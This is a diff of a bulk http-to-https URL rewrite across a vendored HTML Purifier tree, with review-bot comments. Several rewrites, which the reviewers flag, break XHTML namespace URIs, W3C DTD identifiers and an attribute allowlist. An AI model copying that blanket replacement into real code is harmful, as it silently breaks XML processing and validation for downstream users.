href="https://byfiles.storage.msn.com/x1pMvt0I80jTgT6DuaCpEMbprX3nk3jNv_vjigxV_EYVSMyM_PKgEvDEUtuNhQC-F-23mTTcKyqx6eGaeK2e_wMJ0ikwpDdFntk4SY7pfJUv2g2Ck6R2S2vAA?download">+</A></DIV>
<DIV
title="Click here to view the full image using the online photo viewer."
style="DISPLAY: inline; OVERFLOW: hidden; WIDTH: 140px; HEIGHT: 140px"><A
href="http://g.msn.com/5meen_us/171?path=/photomail/{6fc0065f-ffdd-4ca6-9a4c-cc5a93dc122f}&amp;image=47D7B182CFEFB10!127&amp;imagehi=47D7B182CFEFB10!125&amp;CID=323550092004883216"
href="https://g.msn.com/5meen_us/171?path=/photomail/{6fc0065f-ffdd-4ca6-9a4c-cc5a93dc122f}&amp;image=47D7B182CFEFB10!127&amp;imagehi=47D7B182CFEFB10!125&amp;CID=323550092004883216"
border="0"><IMG
style="MARGIN-TOP: 15px; DISPLAY: inline-block; MARGIN-LEFT: 0px"
height=109 src="cid:006A71303B80404E9FB6184E55D6A446@wc" width=140
@@ -70,5 +70,5 @@ style="PADDING-RIGHT: 5px; PADDING-LEFT: 7px; PADDING-BOTTOM: 2px; WIDTH: 100%;
style="BORDER-TOP: #dddddd 1px solid; FONT-SIZE: 10pt; MARGIN-BOTTOM: 10px; WIDTH: 100%; COLOR: #909090; MARGIN-RIGHT: 10px; PADDING-TOP: 9px; FONT-FAMILY: Verdana; HEIGHT: 42px; BACKGROUND-COLOR: #ffffff"><NOBR><SPAN
title="Join Windows Live to share photos using Windows Live Photo E-mail.">Online
pictures are available for 30 days. <A style="COLOR: #0088e4"
href="http://g.msn.com/5meen_us/175">Get Windows Live Mail desktop to create
href="https://g.msn.com/5meen_us/175">Get Windows Live Mail desktop to create
your own photo e-mails. </A></SPAN></NOBR></DIV></BODY></HTML>


@@ -58,7 +58,7 @@ class FSTools
/**
* Copy a file, or recursively copy a folder and its contents; modified
* so that copied files, if PHP, have includes removed
* @note Adapted from http://aidanlister.com/repos/v/function.copyr.php
* @note Adapted from https://aidanlister.com/repos/v/function.copyr.php
*/
public function copyr($source, $dest)
{
@@ -103,7 +103,7 @@ class FSTools
/**
* Delete a file, or a folder and its contents
* @note Adapted from http://aidanlister.com/repos/v/function.rmdirr.php
* @note Adapted from https://aidanlister.com/repos/v/function.rmdirr.php
*/
public function rmdirr($dirname)
{


@@ -40,7 +40,7 @@ abstract class HTMLPurifier_AttrDef
* Convenience method that parses a string as if it were CDATA.
*
* This method process a string in the manner specified at
* <http://www.w3.org/TR/html4/types.html#h-6.2> by removing
* <https://www.w3.org/TR/html4/types.html#h-6.2> by removing
* leading and trailing whitespace, ignoring line feeds, and replacing
* carriage returns and tabs with spaces. While most useful for HTML
* attributes specified as CDATA, it can also be applied to most CSS


@@ -127,11 +127,11 @@ class HTMLPurifier_AttrDef_CSS_FontFamily extends HTMLPurifier_AttrDef
// show up in non-Western pages and are supported by most
// major browsers, for example: " 明朝" is a
// legitimate font-name
// <http://ja.wikipedia.org/wiki/MS_明朝>. See
// <https://ja.wikipedia.org/wiki/MS_明朝>. See
// the CSS3 spec for more examples:
// <http://www.w3.org/TR/2011/WD-css3-fonts-20110324/localizedfamilynames.png>
// <https://www.w3.org/TR/2011/WD-css3-fonts-20110324/localizedfamilynames.png>
// You can see live samples of these on the Internet:
// <http://www.google.co.jp/search?q=font-family++明朝|ゴシック>
// <https://www.google.co.jp/search?q=font-family++明朝|ゴシック>
// However, most of these fonts have ASCII equivalents:
// for example, 'MS Mincho', and it's considered
// professional to use ASCII font names instead of


@@ -1,7 +1,7 @@
<?php
/**
* Validates a URI in CSS syntax, which uses url('http://example.com')
* Validates a URI in CSS syntax, which uses url('https://example.com')
* @note While theoretically speaking a URI in a CSS document could
* be non-embedded, as of CSS2 there is no such usage so we're
* generalizing it. This may need to be changed in the future.


@@ -48,7 +48,7 @@ class HTMLPurifier_AttrDef_HTML_Pixels extends HTMLPurifier_AttrDef
}
// upper-bound value, extremely high values can
// crash operating systems, see <http://ha.ckers.org/imagecrash.html>
// crash operating systems, see <https://ha.ckers.org/imagecrash.html>
// WARNING, above link WILL crash you if you're using Windows
if ($this->max !== null && $int > $this->max) {


@@ -2,7 +2,7 @@
/**
* Primitive email validation class based on the regexp found at
* http://www.regular-expressions.info/email.html
* https://www.regular-expressions.info/email.html
*/
class HTMLPurifier_AttrDef_URI_Email_SimpleCheck extends HTMLPurifier_AttrDef_URI_Email
{


@@ -595,7 +595,7 @@ class HTMLPurifier_Config
'modify your code to use maybeGetRawDefinition, and test if the returned ' .
'value is null before making any edits (if it is null, that means that a ' .
'cached version is available, and no raw operations are necessary). See ' .
'<a href="http://htmlpurifier.org/docs/enduser-customize.html#optimized">' .
'<a href="https://htmlpurifier.org/docs/enduser-customize.html#optimized">' .
'Customize</a> for more details',
E_USER_WARNING
);


@@ -26,7 +26,7 @@ class HTMLPurifier_ConfigSchema_Builder_Xml extends XMLWriter
$purifier = HTMLPurifier::getInstance();
$html = $purifier->purify($html);
$this->writeAttribute('xmlns', 'http://www.w3.org/1999/xhtml');
$this->writeAttribute('xmlns', 'https://www.w3.org/1999/xhtml');
$this->writeRaw($html);
$this->endElement(); // div
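Review bot: The `xmlns` value passed to `writeAttribute` is now `https://www.w3.org/1999/xhtml`, which is not the XHTML namespace: a namespace URI is an opaque identifier that is compared as a string and never fetched, so the scheme swap adds no transport security and places the purified `div` in an unknown namespace for any namespace-aware consumer of the XML this builder writes. Keep the original line, `$this->writeAttribute('xmlns', 'http://www.w3.org/1999/xhtml');`. The same rewrite hits the `<html xmlns=...>` root of the documentation pages and of the Filter.ExtractStyleBlocks template, and the `xmlns:m`/`xmlns` attributes of the Word specimen, so a blanket http-to-https replace should exclude namespace URIs and DOCTYPE identifiers. The enclosing method starts and ends outside the hunk.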


@@ -5,7 +5,7 @@ DEFAULT: false
--DESCRIPTION--
<p>
This directive turns on the in-text display of URIs in &lt;a&gt; tags, and disables
those links. For example, <a href="http://example.com">example</a> becomes
example (<a>http://example.com</a>).
those links. For example, <a href="https://example.com">example</a> becomes
example (<a>https://example.com</a>).
</p>
--# vim: et sw=4 sts=4


@@ -20,8 +20,8 @@ EXTERNAL: CSSTidy
echo '<?xml version="1.0" encoding="UTF-8"?>';
?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
"https://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="https://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
<title>Filter.ExtractStyleBlocks</title>
<?php


@@ -10,7 +10,7 @@ DEFAULT: false
</p>
<p>
This directive enables YouTube video embedding in HTML Purifier. Check
<a href="http://htmlpurifier.org/docs/enduser-youtube.html">this document
<a href="https://htmlpurifier.org/docs/enduser-youtube.html">this document
on embedding videos</a> for more information on what this filter does.
</p>
--# vim: et sw=4 sts=4


@@ -14,7 +14,7 @@ DEFAULT: NULL
If you attempt to allow an element that HTML Purifier does not know
about, HTML Purifier will raise an error. You will need to manually
tell HTML Purifier about this element by using the
<a href="http://htmlpurifier.org/docs/enduser-customize.html">advanced customization features.</a>
<a href="https://htmlpurifier.org/docs/enduser-customize.html">advanced customization features.</a>
</p>
<p>
<strong>Warning:</strong> If another directive conflicts with the


@@ -9,7 +9,7 @@ DEFAULT: NULL
absolute URIs into another URI, usually a URI redirection service.
This directive accepts a URI, formatted with a <code>%s</code> where
the url-encoded original URI should be inserted (sample:
<code>http://www.google.com/url?q=%s</code>).
<code>https://www.google.com/url?q=%s</code>).
</p>
<p>
Uses for this directive:


@@ -10,9 +10,9 @@ DEFAULT: NULL
%HTML.SafeIframe is enabled. Here are some example values:
</p>
<ul>
<li><code>%^http://www.youtube.com/embed/%</code> - Allow YouTube videos</li>
<li><code>%^http://player.vimeo.com/video/%</code> - Allow Vimeo videos</li>
<li><code>%^http://(www.youtube.com/embed/|player.vimeo.com/video/)%</code> - Allow both</li>
<li><code>%^https://www.youtube.com/embed/%</code> - Allow YouTube videos</li>
<li><code>%^https://player.vimeo.com/video/%</code> - Allow Vimeo videos</li>
<li><code>%^https://(www.youtube.com/embed/|player.vimeo.com/video/)%</code> - Allow both</li>
</ul>
<p>
Note that this directive does not give you enough granularity to, say, disable


@@ -120,7 +120,7 @@ class HTMLPurifier_Encoder
* UTF-8 representations.
*
* @note Fallback code adapted from utf8ToUnicode by Henri Sivonen and
* hsivonen@iki.fi at <http://iki.fi/hsivonen/php-utf8/> under the
* hsivonen@iki.fi at <https://iki.fi/hsivonen/php-utf8/> under the
* LGPL license. Notes on what changed are inside, but in general,
* the original code transformed UTF-8 text into an array of integer
* Unicode codepoints. Understandably, transforming that back to
@@ -289,7 +289,7 @@ class HTMLPurifier_Encoder
/**
* Translates a Unicode codepoint into its corresponding UTF-8 character.
* @note Based on Feyd's function at
* <http://forums.devnetwork.net/viewtopic.php?p=191404#191404>,
* <https://forums.devnetwork.net/viewtopic.php?p=191404#191404>,
* which is in public domain.
* @note While we're going to do code point parsing anyway, a good
* optimization would be to refuse to translate code points that
@@ -408,7 +408,7 @@ class HTMLPurifier_Encoder
} else {
trigger_error(
'You have a buggy version of iconv, see https://bugs.php.net/bug.php?id=48147 ' .
'and http://sourceware.org/bugzilla/show_bug.cgi?id=13541',
'and https://sourceware.org/bugzilla/show_bug.cgi?id=13541',
E_USER_ERROR
);
}


@@ -35,7 +35,7 @@ class HTMLPurifier_EntityParser
public function __construct() {
// From
// http://stackoverflow.com/questions/15532252/why-is-reg-being-rendered-as-without-the-bounding-semicolon
// https://stackoverflow.com/questions/15532252/why-is-reg-being-rendered-as-without-the-bounding-semicolon
$semi_optional = "quot|QUOT|lt|LT|gt|GT|amp|AMP|AElig|Aacute|Acirc|Agrave|Aring|Atilde|Auml|COPY|Ccedil|ETH|Eacute|Ecirc|Egrave|Euml|Iacute|Icirc|Igrave|Iuml|Ntilde|Oacute|Ocirc|Ograve|Oslash|Otilde|Ouml|REG|THORN|Uacute|Ucirc|Ugrave|Uuml|Yacute|aacute|acirc|acute|aelig|agrave|aring|atilde|auml|brvbar|ccedil|cedil|cent|copy|curren|deg|divide|eacute|ecirc|egrave|eth|euml|frac12|frac14|frac34|iacute|icirc|iexcl|igrave|iquest|iuml|laquo|macr|micro|middot|nbsp|not|ntilde|oacute|ocirc|ograve|ordf|ordm|oslash|otilde|ouml|para|plusmn|pound|raquo|reg|sect|shy|sup1|sup2|sup3|szlig|thorn|times|uacute|ucirc|ugrave|uml|uuml|yacute|yen|yuml";
// NB: three empty captures to put the fourth match in the right


@@ -112,7 +112,7 @@ class HTMLPurifier_Filter_ExtractStyleBlocks extends HTMLPurifier_Filter
/**
* Takes CSS (the stuff found in <style>) and cleans it.
* @warning Requires CSSTidy <http://csstidy.sourceforge.net/>
* @warning Requires CSSTidy <https://csstidy.sourceforge.net/>
* @param string $css CSS styling to clean
* @param HTMLPurifier_Config $config
* @param HTMLPurifier_Context $context


@@ -17,7 +17,7 @@ class HTMLPurifier_Filter_YouTube extends HTMLPurifier_Filter
public function preFilter($html, $config, $context)
{
$pre_regex = '#<object[^>]+>.+?' .
'(?:http:)?//www.youtube.com/((?:v|cp)/[A-Za-z0-9\-_=]+).+?</object>#s';
'(?:https:)?//www.youtube.com/((?:v|cp)/[A-Za-z0-9\-_=]+).+?</object>#s';
$pre_replace = '<span class="youtube-embed">\1</span>';
return preg_replace($pre_regex, $pre_replace, $html);
}
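Review bot: Swapping `(?:http:)?` for `(?:https:)?` in `$pre_regex` does not change what the filter accepts, because the group is optional and is preceded by `.+?`, which absorbs an `http:` prefix anyway. If the goal was to require https embeds, this line does not achieve it; if there was no such goal, the vendored file is better left identical to upstream so later library updates apply cleanly. Separately, the dots in `www.youtube.com` are unescaped and match any character; `www\.youtube\.com` would state the intended host exactly.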


@@ -195,7 +195,7 @@ class HTMLPurifier_Generator
if (!$token instanceof HTMLPurifier_Token_Text) {
return $this->generateFromToken($token);
}
// Thanks <http://lachy.id.au/log/2005/05/script-comments>
// Thanks <https://lachy.id.au/log/2005/05/script-comments>
$data = preg_replace('#//\s*$#', '', $token->data);
return '<!--//--><![CDATA[//><!--' . "\n" . trim($data) . "\n" . '//--><!]]>';
}
@@ -275,7 +275,7 @@ class HTMLPurifier_Generator
public function escape($string, $quote = null)
{
// Workaround for APC bug on Mac Leopard reported by sidepodcast
// http://htmlpurifier.org/phorum/read.php?3,4823,4846
// https://htmlpurifier.org/phorum/read.php?3,4823,4846
if ($quote === null) {
$quote = ENT_COMPAT;
}


@@ -36,7 +36,7 @@ class HTMLPurifier_HTMLModule_SafeObject extends HTMLPurifier_HTMLModule
'data' => 'URI#embedded',
'codebase' => new HTMLPurifier_AttrDef_Enum(
array(
'http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,40,0'
'https://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,40,0'
)
),
)
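Review bot: The `codebase` allowlist in this hunk now holds only the `https://download.macromedia.com/...` string, so the value the enum accepted before the commit is no longer valid. `HTMLPurifier_AttrDef_Enum` checks the attribute against the listed values, which means stored or incoming markup that still carries the original `http://` codebase would presumably lose the attribute after purification. Because this is the vendored HTML Purifier tree, the edit also makes the copy diverge from upstream. If the https form is really wanted, list both strings in the array rather than replacing the original; the attribute map itself starts and ends outside the hunk.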


@@ -99,7 +99,7 @@ class HTMLPurifier_HTMLModuleManager
array('Tidy_Transitional', 'Tidy_Proprietary'),
array(),
'-//W3C//DTD HTML 4.01 Transitional//EN',
'http://www.w3.org/TR/html4/loose.dtd'
'https://www.w3.org/TR/html4/loose.dtd'
);
$this->doctypes->register(
@@ -109,7 +109,7 @@ class HTMLPurifier_HTMLModuleManager
array('Tidy_Strict', 'Tidy_Proprietary', 'Tidy_Name'),
array(),
'-//W3C//DTD HTML 4.01//EN',
'http://www.w3.org/TR/html4/strict.dtd'
'https://www.w3.org/TR/html4/strict.dtd'
);
$this->doctypes->register(
@@ -119,7 +119,7 @@ class HTMLPurifier_HTMLModuleManager
array('Tidy_Transitional', 'Tidy_XHTML', 'Tidy_Proprietary', 'Tidy_Name'),
array(),
'-//W3C//DTD XHTML 1.0 Transitional//EN',
'http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd'
'https://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd'
);
$this->doctypes->register(
@@ -129,7 +129,7 @@ class HTMLPurifier_HTMLModuleManager
array('Tidy_Strict', 'Tidy_XHTML', 'Tidy_Strict', 'Tidy_Proprietary', 'Tidy_Name'),
array(),
'-//W3C//DTD XHTML 1.0 Strict//EN',
'http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd'
'https://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd'
);
$this->doctypes->register(
@@ -141,7 +141,7 @@ class HTMLPurifier_HTMLModuleManager
array('Tidy_Strict', 'Tidy_XHTML', 'Tidy_Proprietary', 'Tidy_Strict', 'Tidy_Name'), // Tidy_XHTML1_1
array(),
'-//W3C//DTD XHTML 1.1//EN',
'http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd'
'https://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd'
);
}
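Review bot: The system identifiers passed to `$this->doctypes->register()` are fixed strings defined by the W3C specifications, not links to be fetched, and the commit rewrites all five of them to `https://`. A doctype carrying `https://www.w3.org/TR/html4/loose.dtd` no longer matches the published identifier, so validators and XML catalogs that key on the exact string will probably not recognise it. These arguments should keep the original `http://www.w3.org/TR/...` values; the same applies to the DOCTYPE lines in the smoketest templates further down the commit. The enclosing method starts outside the first hunk.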


@@ -44,7 +44,7 @@ class HTMLPurifier_Lexer_PH5P extends HTMLPurifier_Lexer_DOMLex
/*
Copyright 2007 Jeroen van der Meer <http://jero.net/>
Copyright 2007 Jeroen van der Meer <https://jero.net/>
Permission is hereby granted, free of charge, to any person obtaining a
copy of this software and associated documentation files (the


@@ -9,7 +9,7 @@
*
* @note Size is an interesting case because it doesn't map cleanly to CSS.
* Thanks to
* http://style.cleverchimp.com/font_size_intervals/altintervals.html
* https://style.cleverchimp.com/font_size_intervals/altintervals.html
* for reasonable mappings.
* @warning This doesn't work completely correctly; specifically, this
* TagTransform operates before well-formedness is enforced, so


@@ -153,7 +153,7 @@ class HTMLPurifier_URI
$segments_encoder = new HTMLPurifier_PercentEncoder($chars_pchar . '/');
if (!is_null($this->host)) { // this catches $this->host === ''
// path-abempty (hier and relative)
// http://www.example.com/my/path
// https://www.example.com/my/path
// //www.example.com/my/path (looks odd, but works, and
// recognized by most browsers)
// (this set is valid or invalid on a scheme by scheme
@@ -164,12 +164,12 @@ class HTMLPurifier_URI
} elseif ($this->path !== '') {
if ($this->path[0] === '/') {
// path-absolute (hier and relative)
// http:/my/path
// https:/my/path
// /my/path
if (strlen($this->path) >= 2 && $this->path[1] === '/') {
// This could happen if both the host gets stripped
// out
// http://my/path
// https://my/path
// //my/path
$this->path = '';
} else {
@@ -177,7 +177,7 @@ class HTMLPurifier_URI
}
} elseif (!is_null($this->scheme)) {
// path-rootless (hier)
// http:my/path
// https:my/path
// Short circuit evaluation means we don't need to check nz
$this->path = $segments_encoder->encode($this->path);
} else {
@@ -221,8 +221,8 @@ class HTMLPurifier_URI
// reconstruct authority
$authority = null;
// there is a rendering difference between a null authority
// (http:foo-bar) and an empty string authority
// (http:///foo-bar).
// (https:foo-bar) and an empty string authority
// (https:///foo-bar).
if (!is_null($this->host)) {
$authority = '';
if (!is_null($this->userinfo)) {
@@ -238,7 +238,7 @@ class HTMLPurifier_URI
// One might wonder about parsing quirks from browsers after
// this reconstruction. Unfortunately, parsing behavior depends
// on what *scheme* was employed (file:///foo is handled *very*
// differently than http:///foo), so unfortunately we have to
// differently than https:///foo), so unfortunately we have to
// defer to the schemes to do the right thing.
$result = '';
if (!is_null($this->scheme)) {


@@ -72,7 +72,7 @@ abstract class HTMLPurifier_URIScheme
(!is_null($uri->scheme) && ($uri->host === '' || is_null($uri->host))) ||
// if the scheme is not present, a *blank* host is in error,
// since this translates into '///path' which most browsers
// interpret as being 'http://path'.
// interpret as being 'https://path'.
(is_null($uri->scheme) && $uri->host === '')
) {
do {


@@ -5,7 +5,7 @@
;; command-line switch -c, as in phpdoc -c default.ini or phpdoc -c myini.ini. The web
;; interface will automatically generate a list of .ini files that can be used.
;;
;; default.ini is used to generate the online manual at http://www.phpdoc.org/docs
;; default.ini is used to generate the online manual at https://www.phpdoc.org/docs
;;
;; ALL .ini files must be in the user subdirectory of phpDocumentor with an extension of .ini
;;


@@ -1,10 +1,10 @@
MODx Plugin
MODx <http://www.modxcms.com/> is an open source PHP application framework.
MODx <https://www.modxcms.com/> is an open source PHP application framework.
I first came across them in my referrer logs when tillda asked if anyone
could implement an HTML Purifier plugin. This forum thread
<http://modxcms.com/forums/index.php/topic,6604.0.html> eventually resulted
<https://modxcms.com/forums/index.php/topic,6604.0.html> eventually resulted
in the fruition of this plugin that davidm says, "is on top of my favorite
list." HTML Purifier goes great with WYSIWYG editors!
@@ -93,14 +93,14 @@ $purifier = new HTMLPurifier($config);
5. Known Bugs
'rn' characters sometimes mysteriously appear after purification. We are
currently investigating this issue. See: <http://htmlpurifier.org/phorum/read.php?3,1866>
currently investigating this issue. See: <https://htmlpurifier.org/phorum/read.php?3,1866>
6. See Also
A modified version of Jot 1.1.3 is available, which integrates with HTML
Purifier. You can check it out here: <http://modxcms.com/forums/index.php/topic,25621.msg161970.html>
Purifier. You can check it out here: <https://modxcms.com/forums/index.php/topic,25621.msg161970.html>
X. Changelog


@@ -63,7 +63,7 @@ phorum/
5. ENABLE
---------
Navigate to your Phorum admin panel at http://example.com/phorum/admin.php,
Navigate to your Phorum admin panel at https://example.com/phorum/admin.php,
click on Global Settings > Modules, scroll to "HTML Purifier Phorum Mod" and
turn it On.


@@ -40,6 +40,6 @@ set $PHORUM['mod_htmlpurifier']['wysiwyg'] to TRUE if you are using a
WYSIWYG editor (you can do this through a common hook or the web
configuration form).
Visit HTML Purifier at <http://htmlpurifier.org/>.
Visit HTML Purifier at <https://htmlpurifier.org/>.
vim: et sw=4 sts=4


@@ -203,7 +203,7 @@ function phorum_htmlpurifier_quote($array)
/**
* Ensure that our format hook is processed last. Also, loads the library.
* @credits <http://secretsauce.phorum.org/snippets/make_bbcode_last_formatter.php.txt>
* @credits <https://secretsauce.phorum.org/snippets/make_bbcode_last_formatter.php.txt>
*/
function phorum_htmlpurifier_common()
{


@@ -1,7 +1,7 @@
title: HTML Purifier Phorum Mod
desc: This module enables standards-compliant HTML filtering on Phorum. Please check migrate.bbcode.php before enabling this mod.
author: Edward Z. Yang
url: http://htmlpurifier.org/
url: https://htmlpurifier.org/
version: 4.0.0
hook: format|phorum_htmlpurifier_format


@@ -40,7 +40,7 @@ function phorum_htmlpurifier_show_form()
however, make the web configuration interface unavailable.</p>');
require_once 'HTMLPurifier/Printer/ConfigForm.php';
$htmlpurifier_form = new HTMLPurifier_Printer_ConfigForm('config', 'http://htmlpurifier.org/live/configdoc/plain.html#%s');
$htmlpurifier_form = new HTMLPurifier_Printer_ConfigForm('config', 'https://htmlpurifier.org/live/configdoc/plain.html#%s');
$htmlpurifier_form->setTextareaDimensions(23, 7); // widen a little, since we have space
$frm->addMessage($htmlpurifier_form->render(


@@ -71,7 +71,7 @@ function phorum_htmlpurifier_migrate_sigs($offset)
$uri = rtrim(dirname($_SERVER['PHP_SELF']), '/\\');
$extra = 'admin.php?module=modsettings&mod=htmlpurifier&migrate-sigs=' . $offset;
// relies on output buffering to work
header("Location: http://$host$uri/$extra");
header("Location: https://$host$uri/$extra");
exit;
}
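Review bot: The redirect in `header("Location: https://$host$uri/$extra")` now forces the https scheme, and `$host` is assigned outside this hunk, so its origin cannot be checked from here. If it is taken from the request's Host header, the redirect target is client-controlled and should be compared against the configured site host before it is used. The hard-coded scheme also breaks the signature-migration loop on installations that serve the admin panel over plain http; deriving the scheme from the current request or from Phorum's configured base URL would avoid that. The function body starts and ends outside the hunk.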


@@ -7,8 +7,8 @@ echo '<?xml version="1.0" encoding="UTF-8" ?>';
?><!DOCTYPE html
PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
"https://www.w3.org/TR/xhtml1/DTD/xhtml1-loose.dtd">
<html xmlns="https://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>HTML Purifier: All Smoketests</title>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
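Review bot: `xmlns="https://www.w3.org/1999/xhtml"` is not the XHTML namespace, because a namespace name is compared character by character and the defined value is `http://www.w3.org/1999/xhtml`. With the rewritten value an XML parser places `<html>` and its children in an unknown namespace, so the page is not treated as XHTML when it is served or processed as XML. Both this line and the DTD system identifier above it should be restored to their `http://` forms. The same rewrite appears in the other smoketest templates and in the `writeAttribute('xmlns', ...)` call earlier in the commit.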


@@ -15,7 +15,7 @@ $gen_config = HTMLPurifier_Config::createDefault();
$printer_config_form = new HTMLPurifier_Printer_ConfigForm(
'config',
'http://htmlpurifier.org/live/configdoc/plain.html#%s'
'https://htmlpurifier.org/live/configdoc/plain.html#%s'
);
$purifier = new HTMLPurifier($config);
@@ -26,8 +26,8 @@ echo '<?xml version="1.0" encoding="UTF-8" ?>';
?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
"https://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="https://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
<title>HTML Purifier All Config Form smoketest</title>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />


@@ -4,8 +4,8 @@ require 'common.php';
?><!DOCTYPE html
PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
"https://www.w3.org/TR/xhtml1/DTD/xhtml1-loose.dtd">
<html xmlns="https://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>HTML Purifier Attribute Transformation Smoketest</title>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />


@@ -67,7 +67,7 @@
</group>
<group title="img.border">
<sample><![CDATA[<img src="img.png" alt="I" border="2" />]]></sample>
<sample><![CDATA[<a href="http://example.com/"><img src="img.png" alt="I" border="2" /></a>]]></sample>
<sample><![CDATA[<a href="https://example.com/"><img src="img.png" alt="I" border="2" /></a>]]></sample>
</group>
<group title="td,th,hr.width">
<sample><![CDATA[


@@ -19,11 +19,11 @@ echo '<?xml version="1.0" encoding="UTF-8" ?>';
<?php if ($strict) { ?>
<!DOCTYPE html
PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1- Strict.dtd">
"https://www.w3.org/TR/xhtml1/DTD/xhtml1- Strict.dtd">
<?php } else { ?>
<!DOCTYPE html
PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-loose.dtd">
"https://www.w3.org/TR/xhtml1/DTD/xhtml1-loose.dtd">
<?php } ?>
<html>
<head>
@@ -44,8 +44,8 @@ if ($page) {
?>
<div style="float:right;"><div><?php echo $strict ? 'Strict' : 'Loose'; ?>:
<a href="?d=<?php echo (int) !$strict; ?>&amp;p=<?php echo $page ?>">Swap</a></div>
<a href="http://validator.w3.org/check?uri=referer"><img
src="http://www.w3.org/Icons/valid-xhtml10"
<a href="https://validator.w3.org/check?uri=referer"><img
src="https://www.w3.org/Icons/valid-xhtml10"
alt="Valid XHTML 1.0 Transitional" height="31" width="88" style="border:0;" /></a>
</div>
<?php

View File

@@ -7,7 +7,7 @@ div > * {background:#F00; color:#FFF; font-weight:bold; padding:0.2em; margin:0.
#module-text abbr,
#module-text acronym,
#module-text div blockquote,
#module-text blockquote[cite='http://www.example.com'],
#module-text blockquote[cite='https://www.example.com'],
#module-text br,
#module-text cite,
#module-text code,
@@ -23,14 +23,14 @@ div > * {background:#F00; color:#FFF; font-weight:bold; padding:0.2em; margin:0.
#module-text p,
#module-text pre,
#module-text span q,
#module-text q[cite='http://www.example.com'],
#module-text q[cite='https://www.example.com'],
#module-text samp,
#module-text strong,
#module-text var,
#module-hypertext span a,
#module-hypertext a[accesskey='q'],
#module-hypertext a[charset='UTF-8'],
#module-hypertext a[href='http://www.example.com/'],
#module-hypertext a[href='https://www.example.com/'],
#module-hypertext a[hreflang='en'],
#module-hypertext a[rel='nofollow'],
#module-hypertext a[rev='index'],


@@ -1,8 +1,8 @@
<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE html
PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
"https://www.w3.org/TR/xhtml1/DTD/xhtml1-loose.dtd">
<html xmlns="https://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>HTML Purifier All Elements Smoketest</title>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
@@ -33,7 +33,7 @@ otherwise there will be problems.</p>
<abbr>abbr</abbr>
<acronym>acronym</acronym>
<div><blockquote>blockquote</blockquote></div>
<blockquote cite="http://www.example.com">blockquote@cite</blockquote>
<blockquote cite="https://www.example.com">blockquote@cite</blockquote>
<br />
<cite>cite</cite>
<code>code</code>
@@ -49,7 +49,7 @@ otherwise there will be problems.</p>
<p>p</p>
<pre>pre</pre>
<span><q>q</q></span>
<q cite="http://www.example.com">q@cite</q>
<q cite="https://www.example.com">q@cite</q>
<samp>samp</samp>
<strong>strong</strong>
<var>var</var>
@@ -60,7 +60,7 @@ otherwise there will be problems.</p>
<span><a>a</a></span>:
<a accesskey="q">accesskey</a>
<a charset="UTF-8">charset</a>
<a href="http://www.example.com/">href</a>
<a href="https://www.example.com/">href</a>
<a hreflang="en">hreflang</a>
<a rel="nofollow">rel</a>
<a rev="index">rev</a>


@@ -1,8 +1,8 @@
<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE html
PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
"https://www.w3.org/TR/xhtml1/DTD/xhtml1-loose.dtd">
<html xmlns="https://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>HTML Purifier Legacy Smoketest Test Data</title>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />

View File

@@ -11,4 +11,4 @@ $serial = $config->serialize();
$result = unserialize($serial);
$purifier = new HTMLPurifier($result);
echo htmlspecialchars($purifier->purify('<b>Bold</b><br><i><a href="http://google.com">no</a> formatting</i>'));
echo htmlspecialchars($purifier->purify('<b>Bold</b><br><i><a href="https://google.com">no</a> formatting</i>'));


@@ -40,7 +40,7 @@ if (isset($_GET['doc'])) {
?><!DOCTYPE html
PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
